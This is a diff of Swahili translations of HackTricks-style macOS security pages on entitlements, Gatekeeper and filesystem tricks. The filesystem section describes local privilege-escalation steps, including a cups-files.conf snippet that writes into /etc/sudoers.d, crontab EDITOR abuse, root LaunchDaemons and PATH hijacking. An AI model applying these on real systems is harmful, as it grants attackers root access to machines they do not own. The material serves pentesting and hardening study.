Entitlement hii inaruhusu michakato mingine yenye entitlement **`com.apple.security.cs.debugger`** kupata task port ya mchakato unaotendewa na binary yenye entitlement hii na **kuingiza msimbo ndani yake**. Angalia [**hii kwa maelezo zaidi**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
### `com.apple.security.cs.debugger`
Apps zenye Entitlement ya Zana za Ufuatiliaji zinaweza kuita `task_for_pid()` ili kupata task port halali kwa apps zisizosainiwa na wahusika wengine zenye entitlement ya `Get Task Allow` iliyowekwa kuwa `true`. Hata hivyo, hata na entitlement ya zana za ufuatiliaji, debuggers **haziwezi kupata task ports** za michakato ambazo **hazina entitlement ya `Get Task Allow`**, na hivyo kulindwa na Ulinzi wa Uthibitisho wa Mfumo. Angalia [**hii kwa maelezo zaidi**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_debugger).
Apps zenye Entitlement ya Zana za Ufuatiliaji zinaweza kuita `task_for_pid()` ili kupata task port halali kwa apps zisizosainiwa na wahusika wengine zenye entitlement ya `Get Task Allow` iliyowekwa kuwa `true`. Hata hivyo, hata na entitlement ya zana za ufuatiliaji, debuggers **haziwezi kupata task ports** za michakato ambazo **hazina entitlement ya `Get Task Allow`**, na hivyo kulindwa na Ulinzi wa Uadilifu wa Mfumo. Angalia [**hii kwa maelezo zaidi**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_debugger).
### `com.apple.security.cs.disable-library-validation`
@ -33,7 +33,7 @@ Entitlement hii inaruhusu **kupakia frameworks, plug-ins, au maktaba bila kusain
### `com.apple.private.security.clear-library-validation`
Entitlement hii ni sawa sana na **`com.apple.security.cs.disable-library-validation`** lakini **badala** ya **kuondoa** uthibitisho wa maktaba moja kwa moja, inaruhusu mchakato **kuita `csops` system call kuondoa**.\
Entitlement hii ni sawa sana na **`com.apple.security.cs.disable-library-validation`** lakini **badala** ya **kuondoa** uthibitishaji wa maktaba moja kwa moja, inaruhusu mchakato **kuita `csops` system call kuondoa**.\
Angalia [**hii kwa maelezo zaidi**](https://theevilbit.github.io/posts/com.apple.private.security.clear-library-validation/).
### `com.apple.security.cs.allow-dyld-environment-variables`
@ -50,7 +50,7 @@ Entitlements hizi zinaruhusu **kufunga programu bila kuomba ruhusa** kwa mtumiaj
### `com.apple.private.security.kext-management`
Entitlement inayohitajika kuomba **kernel kupakia nyongeza ya kernel**.
Entitlement inayohitajika kuomba **kernel kupakia kiendelezi cha kernel**.
### **`com.apple.private.icloud-account-access`**
@ -74,7 +74,7 @@ TODO: Katika [**ripoti hii**](https://jhftss.github.io/The-Nightmare-of-Apple-OT
### `keychain-access-groups`
Entitlement hii inaorodhesha **makundi ya keychain** ambayo programu ina ufikiaji nayo:
Entitlement hii inaorodhesha **makundi ya keychain** ambayo programu ina ufikiaji:
```xml
<key>keychain-access-groups</key>
<array>
@ -109,7 +109,7 @@ Inaruhusu **kubadilisha** sifa ya **`NFSHomeDirectory`** ya mtumiaji ambayo inab
### **`kTCCServiceSystemPolicyAppBundles`**
Inaruhusu kubadilisha faili ndani ya pakiti za programu (ndani ya app.app), ambayo **imezuiliwa kwa msingi**.
Inaruhusu kubadilisha faili ndani ya pakiti za programu (ndani ya app.app), ambayo **imezuiliwa kwa chaguo-msingi**.
<figure><img src="../../../images/image (31).png" alt=""><figcaption></figcaption></figure>
@ -145,7 +145,7 @@ TODO
### `com.apple.private.nullfs_allow`
Ruhusa hii inaruhusu kuunganisha mfumo wa faili wa nullfs (uliokatazwa kwa msingi). Chombo: [**mount_nullfs**](https://github.com/JamaicanMoose/mount_nullfs/tree/master).
Ruhusa hii inaruhusu kuunganisha mfumo wa faili wa nullfs (uliokatazwa kwa chaguo-msingi). Chombo: [**mount_nullfs**](https://github.com/JamaicanMoose/mount_nullfs/tree/master).
### `kTCCServiceAll`
@ -161,5 +161,3 @@ Ruhusu mchakato **kuomba ruhusa zote za TCC**.
### **`kTCCServicePostEvent`**
{{#include ../../../banners/hacktricks-training.md}}
</details>

44
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
View File

@ -9,8 +9,8 @@ Ruhusa katika **directory**:
- **kusoma** - unaweza **kuorodhesha** entries za directory
- **kuandika** - unaweza **kufuta/kuandika** **files** katika directory na unaweza **kufuta folda tupu**.
- Lakini huwezi **kufuta/kubadilisha folda zisizo tupu** isipokuwa una ruhusa za kuandika juu yake.
- Huwezi **kubadilisha jina la folda** isipokuwa umiliki.
- **kutekeleza** - ume **ruhusiwa kupita** directory - ikiwa huna haki hii, huwezi kufikia files zozote ndani yake, au katika subdirectories zozote.
- Huwezi **kubadilisha jina la folda** isipokuwa unamiliki.
- **kutekeleza** - ume **ruhusiwa kupita** katika directory - ikiwa huna haki hii, huwezi kufikia files zozote ndani yake, au katika subdirectories zozote.
### Mchanganyiko Hatari
@ -20,29 +20,29 @@ Ruhusa katika **directory**:
- Mmiliki mmoja wa **directory** katika njia ni **kikundi cha watumiaji** chenye **ruhusa za kuandika**
- Kikundi cha watumiaji kina **ruhusa za kuandika** kwa **file**
Kwa mchanganyiko wowote wa hapo juu, mshambuliaji anaweza **kuingiza** **sym/hard link** kwenye njia inayotarajiwa ili kupata kuandika kwa kibali bila mipaka.
Kwa mchanganyiko wowote wa hapo juu, mshambuliaji anaweza **kuingiza** **sym/hard link** kwenye njia inayotarajiwa ili kupata kuandika kwa kibali bila kikomo.
### Kesi Maalum ya Folder root R+X
### Kesi Maalum ya Folda root R+X
Ikiwa kuna files katika **directory** ambapo **ni root pekee mwenye R+X access**, hizo **hazipatikani kwa mtu mwingine yeyote**. Hivyo, udhaifu unaoruhusu **kuhamasisha file inayoweza kusomwa na mtumiaji**, ambayo haiwezi kusomwa kwa sababu ya **kizuizi** hicho, kutoka folda hii **kwenda nyingine**, unaweza kutumiwa kusoma files hizi.
Mfano katika: [https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/#nix-directory-permissions)
## Link ya Alama / Link ngumu
## Link ya Alama / Link ya Ngumu
### File/folda yenye ruhusa
Ikiwa mchakato wenye kibali unaandika data katika **file** ambayo inaweza **kudhibitiwa** na **mtumiaji mwenye ruhusa ya chini**, au ambayo inaweza **kuundwa awali** na mtumiaji mwenye ruhusa ya chini. Mtumiaji anaweza tu **kuielekeza kwa file nyingine** kupitia Link ya Alama au Link ngumu, na mchakato wenye kibali utaandika kwenye file hiyo.
Ikiwa mchakato wenye kibali unaandika data katika **file** ambayo inaweza **kudhibitiwa** na **mtumiaji mwenye ruhusa ya chini**, au ambayo inaweza **kuundwa awali** na mtumiaji mwenye ruhusa ya chini. Mtumiaji anaweza tu **kuielekeza kwenye file nyingine** kupitia Link ya Alama au Link ya Ngumu, na mchakato wenye kibali utaandika kwenye file hiyo.
Angalia katika sehemu nyingine ambapo mshambuliaji anaweza **kutilia shaka kuandika bila mipaka ili kupandisha ruhusa**.
Angalia katika sehemu nyingine ambapo mshambuliaji anaweza **kutilia shaka kuandika bila kikomo ili kupandisha ruhusa**.
### Fungua `O_NOFOLLOW`
### Funguo `O_NOFOLLOW`
Bendera `O_NOFOLLOW` inapokuwa inatumika na kazi `open` haitafuata symlink katika kipengele cha mwisho cha njia, lakini itafuata sehemu nyingine za njia. Njia sahihi ya kuzuia kufuata symlinks katika njia ni kwa kutumia bendera `O_NOFOLLOW_ANY`.
Funguo `O_NOFOLLOW` inapokuwa inatumika na kazi `open` haitafuata symlink katika kipengele cha mwisho cha njia, lakini itafuata sehemu nyingine za njia. Njia sahihi ya kuzuia kufuata symlinks katika njia ni kwa kutumia funguo `O_NOFOLLOW_ANY`.
## .fileloc
Files zenye kiambatisho **`.fileloc`** zinaweza kuelekeza kwenye programu nyingine au binaries hivyo wakati zinapofunguliwa, programu/binary itakuwa ndiyo itakayotekelezwa.\
Files zenye kiambishi **`.fileloc`** zinaweza kuelekeza kwenye programu nyingine au binaries hivyo wakati zinapofunguliwa, programu/binary itakuwa ndiyo itakayotekelezwa.\
Mfano:
```xml
<?xml version="1.0" encoding="UTF-8"?>
@ -60,9 +60,9 @@ Mfano:
### Leak FD (no `O_CLOEXEC`)
Ikiwa wito wa `open` haina bendera `O_CLOEXEC`, file descriptor itarithiwa na mchakato wa mtoto. Hivyo, ikiwa mchakato wenye mamlaka unafungua faili yenye mamlaka na kutekeleza mchakato unaodhibitiwa na mshambuliaji, mshambuliaji atakuwa **na FD juu ya faili yenye mamlaka**.
Ikiwa wito wa `open` haina bendera `O_CLOEXEC`, desktop ya faili itarithiwa na mchakato wa mtoto. Hivyo, ikiwa mchakato wenye mamlaka unafungua faili yenye mamlaka na kutekeleza mchakato unaodhibitiwa na mshambuliaji, mshambuliaji atakuwa **na FD juu ya faili yenye mamlaka**.
Ikiwa unaweza kufanya **mchakato ufungue faili au folda yenye mamlaka ya juu**, unaweza kutumia **`crontab`** kufungua faili katika `/etc/sudoers.d` na **`EDITOR=exploit.py`**, hivyo `exploit.py` itapata FD kwa faili ndani ya `/etc/sudoers` na kuifanya iweze kutumika.
Ikiwa unaweza kufanya **mchakato ufungue faili au folda zenye mamlaka ya juu**, unaweza kutumia **`crontab`** kufungua faili katika `/etc/sudoers.d` na **`EDITOR=exploit.py`**, hivyo `exploit.py` itapata FD kwa faili ndani ya `/etc/sudoers` na kuifanya.
Kwa mfano: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098), code: https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging
@ -156,7 +156,7 @@ macos-xattr-acls-extra-stuff.md
### Kupita ukaguzi wa binaries za jukwaa
Baadhi ya ukaguzi wa usalama huangalia kama binary ni **binary ya jukwaa**, kwa mfano kuruhusu kuungana na huduma ya XPC. Hata hivyo, kama ilivyoonyeshwa katika kupita kwenye https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/, inawezekana kupita ukaguzi huu kwa kupata binary ya jukwaa (kama /bin/ls) na kuingiza exploit kupitia dyld kwa kutumia variable ya mazingira `DYLD_INSERT_LIBRARIES`.
Baadhi ya ukaguzi wa usalama huangalia kama binary ni **binary ya jukwaa**, kwa mfano kuruhusu kuungana na huduma ya XPC. Hata hivyo, kama ilivyoelezwa katika kupita kwenye https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/, inawezekana kupita ukaguzi huu kwa kupata binary ya jukwaa (kama /bin/ls) na kuingiza exploit kupitia dyld kwa kutumia variable ya mazingira `DYLD_INSERT_LIBRARIES`.
### Kupita bendera `CS_REQUIRE_LV` na `CS_FORCED_LV`
@ -278,23 +278,23 @@ Andika **LaunchDaemon** ya kiholela kama **`/Library/LaunchDaemons/xyz.hacktrick
</dict>
</plist>
```
Tuunda tu skripti `/Applications/Scripts/privesc.sh` na **amri** unazotaka kuendesha kama root.
Just generate the script `/Applications/Scripts/privesc.sh` with the **commands** you would like to run as root.
### Faili la Sudoers
### Sudoers File
Ikiwa una **kuandika bila mipaka**, unaweza kuunda faili ndani ya folda **`/etc/sudoers.d/`** ukijipa **mamlaka ya sudo**.
If you have **arbitrary write**, you could create a file inside the folder **`/etc/sudoers.d/`** granting yourself **sudo** privileges.
### Faili za PATH
### PATH files
Faili **`/etc/paths`** ni moja ya maeneo makuu yanayojaza variable ya mazingira ya PATH. Lazima uwe root ili kuandika tena, lakini ikiwa skripti kutoka **mchakato wenye mamlaka** inatekeleza **amri bila njia kamili**, unaweza kuwa na uwezo wa **kudhibiti** kwa kubadilisha faili hili.
The file **`/etc/paths`** is one of the main places that populates the PATH env variable. You must be root to overwrite it, but if a script from **privileged process** is executing some **command without the full path**, you might be able to **hijack** it modifying this file.
Pia unaweza kuandika faili katika **`/etc/paths.d`** ili kupakia folda mpya kwenye variable ya mazingira ya `PATH`.
You can also write files in **`/etc/paths.d`** to load new folders into the `PATH` env variable.
### cups-files.conf
Teknolojia hii ilitumika katika [hiki andiko](https://www.kandji.io/blog/macos-audit-story-part1).
Hii mbinu ilitumika katika [this writeup](https://www.kandji.io/blog/macos-audit-story-part1).
Unda faili `/etc/cups/cups-files.conf` na maudhui yafuatayo:
Create the file `/etc/cups/cups-files.conf` with the following content:
```
ErrorLog /etc/sudoers.d/lpe
LogFilePerm 777
@ -326,7 +326,7 @@ echo $FILENAME
```
## POSIX Shared Memory
**POSIX shared memory** inaruhusu michakato katika mifumo ya uendeshaji inayokubaliana na POSIX kufikia eneo la kawaida la kumbukumbu, ikirahisisha mawasiliano ya haraka ikilinganishwa na mbinu nyingine za mawasiliano kati ya michakato. Inahusisha kuunda au kufungua kitu cha kumbukumbu ya pamoja kwa kutumia `shm_open()`, kuweka ukubwa wake kwa `ftruncate()`, na kuunganisha katika nafasi ya anwani ya mchakato kwa kutumia `mmap()`. Michakato inaweza kisha kusoma moja kwa moja kutoka na kuandika kwenye eneo hili la kumbukumbu. Ili kudhibiti ufikiaji wa pamoja na kuzuia uharibifu wa data, mitambo ya usawazishaji kama vile mutexes au semaphores mara nyingi hutumiwa. Hatimaye, michakato inafuta na kufunga kumbukumbu ya pamoja kwa kutumia `munmap()` na `close()`, na kwa hiari kuondoa kitu cha kumbukumbu kwa kutumia `shm_unlink()`. Mfumo huu ni wa ufanisi hasa kwa IPC ya haraka na yenye ufanisi katika mazingira ambapo michakato mingi inahitaji kufikia data ya pamoja kwa haraka.
**POSIX shared memory** inaruhusu michakato katika mifumo ya uendeshaji inayokubaliana na POSIX kufikia eneo la kawaida la kumbukumbu, ikirahisisha mawasiliano ya haraka ikilinganishwa na mbinu nyingine za mawasiliano kati ya michakato. Inahusisha kuunda au kufungua kitu cha kumbukumbu ya pamoja kwa kutumia `shm_open()`, kuweka ukubwa wake kwa `ftruncate()`, na kuunganisha katika nafasi ya anwani ya mchakato kwa kutumia `mmap()`. Michakato inaweza kisha kusoma moja kwa moja kutoka na kuandika kwenye eneo hili la kumbukumbu. Ili kudhibiti ufikiaji wa pamoja na kuzuia uharibifu wa data, mitambo ya usawazishaji kama vile mutexes au semaphores mara nyingi hutumiwa. Hatimaye, michakato inafuta na kufunga kumbukumbu ya pamoja kwa kutumia `munmap()` na `close()`, na kwa hiari kuondoa kitu cha kumbukumbu kwa kutumia `shm_unlink()`. Mfumo huu ni wa ufanisi hasa kwa IPC yenye ufanisi na haraka katika mazingira ambapo michakato mingi inahitaji kufikia data ya pamoja kwa haraka.
<details>

56
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
View File

@ -5,25 +5,25 @@
## Gatekeeper
**Gatekeeper** ni kipengele cha usalama kilichotengenezwa kwa mifumo ya uendeshaji ya Mac, kilichoundwa kuhakikisha kwamba watumiaji **wanatumia tu programu zinazotegemewa** kwenye mifumo yao. Inafanya kazi kwa **kuhakiki programu** ambayo mtumiaji anapakua na kujaribu kufungua kutoka **vyanzo vya nje ya App Store**, kama vile programu, plug-in, au kifurushi cha installer.
**Gatekeeper** ni kipengele cha usalama kilichotengenezwa kwa mifumo ya uendeshaji ya Mac, kilichoundwa kuhakikisha kwamba watumiaji **wanatumia tu programu zinazotegemewa** kwenye mifumo yao. Inafanya kazi kwa **kuhakiki programu** ambayo mtumiaji anapakua na kujaribu kufungua kutoka **vyanzo vya nje ya Duka la Programu**, kama vile programu, plug-in, au kifurushi cha installer.
Mekaniki kuu ya Gatekeeper inategemea **mchakato wa uthibitishaji**. Inakagua ikiwa programu iliyopakuliwa **imeandikwa na mtengenezaji anayekubalika**, kuhakikisha uhalali wa programu hiyo. Zaidi ya hayo, inathibitisha ikiwa programu hiyo **imeandikwa na Apple**, ikithibitisha kwamba haina maudhui mabaya yanayojulikana na haijabadilishwa baada ya kuandikwa.
Zaidi, Gatekeeper inaimarisha udhibiti wa mtumiaji na usalama kwa **kuwataka watumiaji kuidhinisha ufunguzi** wa programu zilizopakuliwa kwa mara ya kwanza. Ulinzi huu husaidia kuzuia watumiaji kuendesha kwa bahati mbaya msimbo wa utendaji ambao unaweza kuwa na madhara ambao wanaweza kuwa wameukosea kwa faili ya data isiyo na madhara.
Zaidi, Gatekeeper inaimarisha udhibiti wa mtumiaji na usalama kwa **kuwataka watumiaji kuidhinisha ufunguzi** wa programu zilizopakuliwa kwa mara ya kwanza. Ulinzi huu husaidia kuzuia watumiaji kuendesha kwa bahati mbaya msimbo wa utendaji ambao unaweza kuwa na madhara ambao wanaweza kuwa wamechukulia kuwa faili ya data isiyo na madhara.
### Application Signatures
Saini za programu, pia zinajulikana kama saini za msimbo, ni sehemu muhimu ya miundombinu ya usalama ya Apple. Zinatumika **kuhakiki utambulisho wa mwandishi wa programu** (mtengenezaji) na kuhakikisha kwamba msimbo haujabadilishwa tangu uandikwe mara ya mwisho.
Saini za programu, pia zinajulikana kama saini za msimbo, ni sehemu muhimu ya miundombinu ya usalama ya Apple. Zinatumika ku **thibitisha utambulisho wa mwandishi wa programu** (mtengenezaji) na kuhakikisha kwamba msimbo haujabadilishwa tangu uandikwe mara ya mwisho.
Hapa kuna jinsi inavyofanya kazi:
Hivi ndivyo inavyofanya kazi:
1. **Kusaini Programu:** Wakati mtengenezaji yuko tayari kusambaza programu yao, wan **asaini programu kwa kutumia funguo ya faragha**. Funguo hii ya faragha inahusishwa na **cheti ambacho Apple inatoa kwa mtengenezaji** wanapojisajili katika Programu ya Wataalamu wa Apple. Mchakato wa kusaini unajumuisha kuunda hash ya kifahari ya sehemu zote za programu na kuificha hash hii kwa funguo ya faragha ya mtengenezaji.
2. **Kusambaza Programu:** Programu iliyosainiwa kisha inasambazwa kwa watumiaji pamoja na cheti cha mtengenezaji, ambacho kinafunguo ya umma inayolingana.
3. **Kuhakiki Programu:** Wakati mtumiaji anapakua na kujaribu kuendesha programu, mfumo wa uendeshaji wa Mac unatumia funguo ya umma kutoka kwa cheti cha mtengenezaji kufichua hash. Kisha inarejesha hash kulingana na hali ya sasa ya programu na kulinganisha hii na hash iliyofichuliwa. Ikiwa zinakubaliana, inamaanisha **programu hiyo haijabadilishwa** tangu mtengenezaji aisaini, na mfumo unaruhusu programu hiyo kuendesha.
1. **Kusaini Programu:** Wakati mtengenezaji yuko tayari kusambaza programu yao, wan **asaini programu kwa kutumia funguo ya faragha**. Funguo hii ya faragha inahusishwa na **cheti ambacho Apple inatoa kwa mtengenezaji** wanapojisajili katika Programu ya Wataalamu wa Apple. Mchakato wa kusaini unajumuisha kuunda hash ya kijiografia ya sehemu zote za programu na kuificha hash hii kwa funguo ya faragha ya mtengenezaji.
2. **Kusambaza Programu:** Programu iliyosainiwa kisha inasambazwa kwa watumiaji pamoja na cheti cha mtengenezaji, ambacho kinafunguo ya umma inayohusiana.
3. **Kuthibitisha Programu:** Wakati mtumiaji anapakua na kujaribu kuendesha programu, mfumo wa uendeshaji wa Mac unatumia funguo ya umma kutoka kwa cheti cha mtengenezaji kufichua hash. Kisha inarejesha hash kulingana na hali ya sasa ya programu na kulinganisha hii na hash iliyofichuliwa. Ikiwa zinakubaliana, inamaanisha **programu hiyo haijabadilishwa** tangu mtengenezaji aisaini, na mfumo unaruhusu programu hiyo kuendesha.
Saini za programu ni sehemu muhimu ya teknolojia ya Gatekeeper ya Apple. Wakati mtumiaji anajaribu **kufungua programu iliyopakuliwa kutoka mtandao**, Gatekeeper inathibitisha saini ya programu. Ikiwa imeandikwa na cheti kilichotolewa na Apple kwa mtengenezaji anayejulikana na msimbo haujabadilishwa, Gatekeeper inaruhusu programu hiyo kuendesha. Vinginevyo, inazuia programu hiyo na kumjulisha mtumiaji.
Kuanzia macOS Catalina, **Gatekeeper pia inakagua ikiwa programu hiyo imeandikwa** na Apple, ikiongeza safu ya ziada ya usalama. Mchakato wa kuandikwa unakagua programu hiyo kwa masuala ya usalama yanayojulikana na msimbo mbaya, na ikiwa ukaguzi huu unakubalika, Apple inaongeza tiketi kwa programu ambayo Gatekeeper inaweza kuithibitisha.
Kuanzia macOS Catalina, **Gatekeeper pia inakagua ikiwa programu hiyo imeandikwa** na Apple, ikiongeza safu ya ziada ya usalama. Mchakato wa kuandikwa unakagua programu hiyo kwa masuala ya usalama yanayojulikana na msimbo mbaya, na ikiwa ukaguzi huu unakubalika, Apple inaongeza tiketi kwa programu ambayo Gatekeeper inaweza kuthibitisha.
#### Check Signatures
@ -69,9 +69,9 @@ GateKeeper itakagua ikiwa kulingana na **mapendeleo & saini** binary inaweza kut
<figure><img src="../../../images/image (1150).png" alt=""><figcaption></figcaption></figure>
**`syspolicyd`** ndicho daemon kuu inayohusika na kutekeleza Gatekeeper. Inahifadhi hifadhidata iliyoko katika `/var/db/SystemPolicy` na inawezekana kupata msimbo wa kusaidia [hifadhidata hapa](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/policydb.cpp) na [templat ya SQL hapa](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/syspolicy.sql). Kumbuka kwamba hifadhidata hiyo haina vizuizi vya SIP na inaweza kuandikwa na root na hifadhidata `/var/db/.SystemPolicy-default` inatumika kama nakala ya awali endapo nyingine itaharibika.
**`syspolicyd`** ndiye daemon mkuu anayehusika na kutekeleza Gatekeeper. Inashikilia hifadhidata iliyoko katika `/var/db/SystemPolicy` na inawezekana kupata msimbo wa kusaidia [hifadhidata hapa](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/policydb.cpp) na [templat ya SQL hapa](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/syspolicy.sql). Kumbuka kwamba hifadhidata hiyo haina vizuizi vya SIP na inaweza kuandikwa na root na hifadhidata `/var/db/.SystemPolicy-default` inatumika kama nakala ya awali endapo nyingine itaharibika.
Zaidi ya hayo, bundles **`/var/db/gke.bundle`** na **`/var/db/gkopaque.bundle`** zina faili zenye sheria ambazo zinaingizwa katika hifadhidata. Unaweza kuangalia hifadhidata hii kama root kwa:
Zaidi ya hayo, vifurushi **`/var/db/gke.bundle`** na **`/var/db/gkopaque.bundle`** vina faili zenye sheria ambazo zinaingizwa katika hifadhidata. Unaweza kuangalia hifadhidata hii kama root kwa:
```bash
# Open database
sqlite3 /var/db/SystemPolicy
@ -87,10 +87,10 @@ anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists an
```
**`syspolicyd`** pia inatoa seva ya XPC yenye operesheni tofauti kama `assess`, `update`, `record` na `cancel` ambazo pia zinaweza kufikiwa kwa kutumia **`Security.framework`'s `SecAssessment*`** APIs na **`xpctl`** kwa kweli inazungumza na **`syspolicyd`** kupitia XPC.
Tazama jinsi sheria ya kwanza ilivyomalizika kwa "**App Store**" na ya pili kwa "**Developer ID**" na kwamba katika picha iliyopita ilikuwa **imewezeshwa kutekeleza programu kutoka kwa App Store na waendelezaji waliotambulika**.\
Tazama jinsi sheria ya kwanza ilivyomalizika katika "**App Store**" na ya pili katika "**Developer ID**" na kwamba katika picha iliyopita ilikuwa **imewezeshwa kutekeleza programu kutoka kwa App Store na waendelezaji waliotambulika**.\
Ikiwa **utabadilisha** mipangilio hiyo kuwa App Store, sheria za "**Notarized Developer ID" zitaondoka**.
Pia kuna maelfu ya sheria za **aina GKE** :
Pia kuna maelfu ya sheria za **aina GKE**:
```bash
SELECT requirement,allow,disabled,label from authority where label = 'GKE' limit 5;
cdhash H"b40281d347dc574ae0850682f0fd1173aa2d0a39"|1|0|GKE
@ -146,7 +146,7 @@ Kuhusu **kernel extensions**, folda `/var/db/SystemPolicyConfiguration` ina fail
### Faili za Kuzuia
Wakati wa **kupakua** programu au faili, programu maalum za macOS kama vile vivinjari vya wavuti au wateja wa barua pepe **huongeza sifa ya faili iliyopanuliwa**, inayojulikana kwa jina la "**quarantine flag**," kwa faili iliyopakuliwa. Sifa hii inafanya kazi kama kipimo cha usalama ili **kuashiria faili** kama inatoka kwenye chanzo kisichotegemewa (mtandao), na inaweza kubeba hatari. Hata hivyo, si programu zote huongeza sifa hii, kwa mfano, programu za kawaida za mteja wa BitTorrent mara nyingi hupita mchakato huu.
Pale **kupakua** programu au faili, programu maalum za macOS kama vile vivinjari vya wavuti au wateja wa barua pepe **huongeza sifa ya faili iliyopanuliwa**, inayojulikana kwa jina la "**quarantine flag**," kwa faili iliyopakuliwa. Sifa hii inafanya kazi kama kipimo cha usalama ili **kuashiria faili** kama inatoka kwenye chanzo kisichotegemewa (mtandao), na inaweza kubeba hatari. Hata hivyo, si programu zote huongeza sifa hii, kwa mfano, programu maarufu za mteja wa BitTorrent kawaida hupita mchakato huu.
**Kuwepo kwa quarantine flag kunaashiria kipengele cha usalama cha Gatekeeper cha macOS wakati mtumiaji anajaribu kutekeleza faili hiyo**.
@ -172,13 +172,13 @@ spctl --enable
spctl --disable
#You can also allow nee identifies to execute code using the binary "spctl"
```
Unaweza pia **kupata kama faili ina sifa ya kuzuia ya muda mrefu** kwa kutumia:
Unaweza pia **kupata kama faili ina sifa ya kuzuia ya ziada** kwa kutumia:
```bash
xattr file.png
com.apple.macl
com.apple.quarantine
```
Angalia **thamani** ya **sifa** za **kupanuliwa** na pata programu ambayo iliandika sifa ya karantini na:
Angalia **thamani** ya **sifa** za **kupanuliwa** na upate programu ambayo iliandika sifa ya karantini na:
```bash
xattr -l portada.png
com.apple.macl:
@ -274,26 +274,26 @@ Taarifa za karantini pia zinahifadhiwa katika hifadhidata kuu inayosimamiwa na L
#### **libquarantine.dylb**
Maktaba hii inatoa kazi kadhaa zinazoruhusu kubadilisha maeneo ya sifa za kupanuliwa.
Maktaba hii inatoa kazi kadhaa zinazoruhusu kubadilisha maeneo ya sifa za ziada.
APIs za `qtn_file_*` zinahusiana na sera za karantini za faili, APIs za `qtn_proc_*` zinatumika kwa michakato (faili zilizoundwa na mchakato). Kazi zisizotolewa za `__qtn_syscall_quarantine*` ndizo zinazotumia sera ambazo zinaita `mac_syscall` na "Quarantine" kama hoja ya kwanza ambayo inatuma maombi kwa `Quarantine.kext`.
#### **Quarantine.kext**
Kipanuzi cha kernel kinapatikana tu kupitia **cache ya kernel kwenye mfumo**; hata hivyo, unaweza kupakua **Kernel Debug Kit kutoka** [**https://developer.apple.com/**](https://developer.apple.com/), ambayo itakuwa na toleo lililosimbwa la kipanuzi.
Kipanuzi cha kernel kinapatikana tu kupitia **kernel cache kwenye mfumo**; hata hivyo, unaweza kupakua **Kernel Debug Kit kutoka** [**https://developer.apple.com/**](https://developer.apple.com/), ambayo itakuwa na toleo lililosimbwa la kipanuzi.
Kext hii itashughulikia kupitia MACF simu kadhaa ili kukamata matukio yote ya mzunguko wa faili: Uundaji, ufunguzi, upatanishi, kuunganisha... hata `setxattr` ili kuzuia kuweka sifa ya kupanuliwa ya `com.apple.quarantine`.
Kext hii itashughulikia kupitia MACF simu kadhaa ili kukamata matukio yote ya mzunguko wa faili: Uundaji, ufunguzi, upatanishi, kuunganisha... hata `setxattr` ili kuzuia kuweka sifa ya ziada ya `com.apple.quarantine`.
Pia inatumia MIB kadhaa:
- `security.mac.qtn.sandbox_enforce`: Lazimisha karantini pamoja na Sandbox
- `security.mac.qtn.user_approved_exec`: Michakato ya karantini inaweza tu kutekeleza faili zilizothibitishwa
- `security.mac.qtn.user_approved_exec`: Michakato iliyowekwa karantini inaweza tu kutekeleza faili zilizothibitishwa
### XProtect
XProtect ni kipengele cha **anti-malware** kilichojengwa ndani ya macOS. XProtect **inaangalia programu yoyote inapozinduliwa au kubadilishwa kwa mara ya kwanza dhidi ya hifadhidata yake** ya malware inayojulikana na aina za faili zisizo salama. Unapopakua faili kupitia programu fulani, kama Safari, Mail, au Messages, XProtect moja kwa moja inachunguza faili hiyo. Ikiwa inalingana na malware yoyote inayojulikana katika hifadhidata yake, XProtect itazuia **faili hiyo isifanye kazi** na kukujulisha kuhusu tishio hilo.
Hifadhidata ya XProtect **inasasishwa mara kwa mara** na Apple kwa ufafanuzi mpya wa malware, na sasisho hizi zinapakuliwa na kufungwa kiotomatiki kwenye Mac yako. Hii inahakikisha kwamba XProtect iko daima na habari za hivi punde kuhusu vitisho vinavyojulikana.
Hifadhidata ya XProtect **inasasishwa mara kwa mara** na Apple kwa maelezo mapya ya malware, na sasisho haya hupakuliwa na kufungwa kiotomatiki kwenye Mac yako. Hii inahakikisha kwamba XProtect iko daima na habari za hivi punde kuhusu vitisho vinavyojulikana.
Hata hivyo, inafaa kutambua kwamba **XProtect si suluhisho kamili la antivirus**. Inakagua tu orodha maalum ya vitisho vinavyojulikana na haisahihishi skanning ya upatikanaji kama programu nyingi za antivirus.
@ -315,13 +315,13 @@ Kumbuka kwamba kuna App nyingine katika **`/Library/Apple/System/Library/CoreSer
> [!CAUTION]
> Kumbuka kwamba Gatekeeper **haiendeshwi kila wakati** unapotekeleza programu, ni _**AppleMobileFileIntegrity**_ (AMFI) tu itakay **thibitisha saini za msimbo wa kutekeleza** unapotekeleza app ambayo tayari imeendeshwa na kuthibitishwa na Gatekeeper.
Kwa hivyo, hapo awali ilikuwa inawezekana kutekeleza app ili kuikatia cache na Gatekeeper, kisha **kubadilisha faili zisizotekelezwa za programu** (kama Electron asar au NIB files) na ikiwa hakuna kinga nyingine zilizopo, programu hiyo ilitekelezwa na **nyongeza mbaya**.
Kwa hivyo, hapo awali ilikuwa inawezekana kutekeleza app ili kuikatia cache na Gatekeeper, kisha **kubadilisha faili zisizotekelezwa za programu** (kama Electron asar au faili za NIB) na ikiwa hakuna kinga nyingine zilizopo, programu hiyo ilitekelezwa na **nyongeza mbaya**.
